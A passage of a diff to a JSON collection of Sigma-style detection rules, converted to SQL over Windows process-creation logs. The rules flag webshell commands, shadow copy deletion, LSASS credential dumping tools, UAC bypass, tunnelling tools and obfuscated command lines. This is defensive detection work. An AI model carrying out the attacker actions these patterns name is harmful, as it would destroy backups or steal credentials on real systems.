LIKE '%Mouse Lock\\_%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_driverquery_usage.yml" + "filename": "proc_creation_win_pua_mouselock_execution.yml" }, { - "title": "HackTool - Htran/NATBypass Execution", - "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "title": "Chopper Webshell Process Pattern", + "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", "status": "experimental", - "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. 
NATBypass)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "author": "Florian Roth (Nextron Systems), MSTI (query)", "tags": [ - "attack.command_and_control", - "attack.t1090", - "attack.s0040" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\htran.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" + "filename": "proc_creation_win_webshell_chopper.yml" }, { - "title": "Potential Recon Activity Using DriverQuery.EXE", - "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", - "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Findstr Launching .lnk File", + "id": "33339be3-148b-4e16-af56-ad16ec6c7e7b", + "status": "test", + "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", + "author": "Trent 
Liffick", "tags": [ - "attack.discovery" + "attack.defense_evasion", + "attack.t1036", + "attack.t1202", + "attack.t1027.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "proc_creation_win_driverquery_recon.yml" + "filename": "proc_creation_win_findstr_lnk.yml" }, { - "title": "Powershell Inline Execution From A File", - "id": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", + "title": "Reg Add Suspicious Paths", + "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", "status": "experimental", - "description": "Detects inline execution of PowerShell code from a file", - "author": "frack113", + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", + "author": "frack113, Nasreddine Bencherchali", + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562.001" + ], "falsepositives": [ - "Unknown" + "Rare legitimate add to registry via cli (to these locations)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND 
Channel = 'Security' AND (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command %' ESCAPE '\\' OR CommandLine LIKE '%icm %' ESCAPE '\\') AND (CommandLine LIKE '%cat %' ESCAPE '\\' OR CommandLine LIKE '%get-content %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\') AND CommandLine LIKE '% -raw%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_exec_data_file.yml" + "filename": "proc_creation_win_reg_susp_paths.yml" }, { - "title": "Renamed PsExec Service Execution", - "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", + "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", "status": "experimental", - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution" - ], + "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", 
"rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'psexesvc.exe' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" + "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" }, { - "title": "Regsvr32 Command Line Without DLL", - "id": "50919691-7302-437f-8e10-1fe088afa145", - "status": "test", - "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", - "author": "Florian Roth (Nextron Systems)", + "title": "Logged-On User Password Change Via Ksetup.EXE", + "id": "c9783e20-4793-4164-ba96-d9ee483992c4", + "status": "experimental", + "description": "Detects password change for the logged-on user's via \"ksetup.exe\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574", "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" + "SELECT * FROM 
logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ksetup.exe' ESCAPE '\\' OR OriginalFileName = 'ksetup.exe') AND CommandLine LIKE '% /ChangePassword %' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_no_dll.yml" + "filename": "proc_creation_win_ksetup_password_change_user.yml" }, { - "title": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", - "id": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "title": "Suspicious Greedy Compression Using Rar.EXE", + "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", "status": "experimental", - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", - "author": "frack113", + "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", + "author": "X__Junior (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "App-V clients" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SyncAppvPublishingServer.exe' ESCAPE '\\' OR OriginalFileName = 'syncappvpublishingserver.exe') AND CommandLine LIKE '%\"n; %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE 
'\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" + "filename": "proc_creation_win_rar_susp_greedy_compression.yml" }, { - "title": "Shadow Copies Deletion Using Operating Systems Utilities", - "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities", - "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", + "title": "UAC Bypass Using Windows Media Player - Process", + "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND 
(CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" ], - "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" + "filename": "proc_creation_win_uac_bypass_wmp.yml" }, { - "title": "DumpMinitool Usage", - "id": "dee0a7a3-f200-4112-a99b-952196d81e42", + "title": "HackTool - Inveigh Execution", + "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", "status": "experimental", - "description": "Detects the use of \"DumpMinitool.exe\" a tool bundled with Visual Studio and DotNTET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", + "attack.credential_access", "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') OR (CommandLine LIKE '% --processId %' ESCAPE '\\' AND CommandLine LIKE '% 
--dumpType Full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dumpminitool_execution.yml" + "filename": "proc_creation_win_hktl_inveigh.yml" }, { - "title": "HackTool - SecurityXploded Execution", - "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "status": "stable", - "description": "Detects the execution of SecurityXploded Tools", + "title": "Renamed AdFind Execution", + "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", + "status": "test", + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. 
It is used to domain trust discovery to plan out subsequent steps in the attack chain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Company = 'SecurityXploded' OR NewProcessName LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (NewProcessName LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_secutyxploded.yml" 
+ "filename": "proc_creation_win_renamed_adfind.yml" }, { - "title": "Abusing Print Executable", - "id": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", - "status": "test", - "description": "Attackers can use print.exe for remote file copy", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], + "title": "Suspicious WERMGR Process Patterns", + "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", + "status": "experimental", + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\print.exe' ESCAPE '\\' AND CommandLine LIKE 'print%' ESCAPE '\\' AND CommandLine LIKE '%/D%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\') AND NOT (CommandLine LIKE '%print.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": 
"proc_creation_win_print_remote_file_copy.yml" + "filename": "proc_creation_win_wermgr_susp_child_process.yml" }, { - "title": "Set Suspicious Files as System Files Using Attrib.EXE", - "id": "efec536f-72e8-4656-8960-5e85d091345b", - "status": "experimental", - "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - CreateMiniDump Execution", + "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "status": "test", + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE 
'%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_attrib_system_susp_paths.yml" + "filename": "proc_creation_win_hktl_createminidump.yml" }, { - "title": "Use of PktMon.exe", - "id": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", - "status": "test", - "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", - "author": "frack113", + "title": "Phishing Pattern ISO in Archive", + "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "status": "experimental", + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1040" + "attack.initial_access", + "attack.t1566" ], "falsepositives": [ - "Legitimate use" + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pktmon.exe' ESCAPE '\\' OR OriginalFileName = 'PktMon.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pktmon.yml" + "filename": "proc_creation_win_susp_archiver_iso_phishing.yml" }, { - "title": "CL_Mutexverifiers.ps1 Proxy Execution", - "id": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", + "title": "Potential Dosfuscation Activity", + "id": "a77c1610-fc73-4019-8e29-0f51efc04a51", "status": "experimental", - "description": "Detects the use of a Microsoft signed script to execute commands", - "author": "oscd.community, Natalia Shornikova, frack113", + "description": "Detects possible payload obfuscation via the commandline", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND CommandLine LIKE '%runAfterCancelProcess %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%^^%' ESCAPE '\\' OR CommandLine LIKE '%^|^%' ESCAPE '\\' OR CommandLine LIKE '%,;,%' ESCAPE '\\' OR CommandLine LIKE '%;;;;%' ESCAPE '\\' OR CommandLine LIKE '%;; ;;%' ESCAPE '\\' OR CommandLine LIKE '%(,(,%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC:~%' ESCAPE '\\' OR CommandLine LIKE '% c^m^d%' ESCAPE '\\' OR CommandLine LIKE '%^c^m^d%' ESCAPE '\\' OR CommandLine LIKE '% c^md%' ESCAPE '\\' OR CommandLine LIKE '% cm^d%' ESCAPE '\\' OR CommandLine LIKE '%^cm^d%' ESCAPE '\\' OR CommandLine LIKE '% s^et %' ESCAPE '\\' OR CommandLine LIKE '% s^e^t %' ESCAPE '\\' OR CommandLine LIKE '% se^t %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml" + "filename": "proc_creation_win_cmd_dosfuscation.yml" }, { - "title": "Regsvr32 Spawning Explorer", - "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "status": "experimental", - 
"description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "author": "elhoim", + "title": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call", + "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", + "status": "test", + "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", + "author": "pH-T (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1059.001", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE 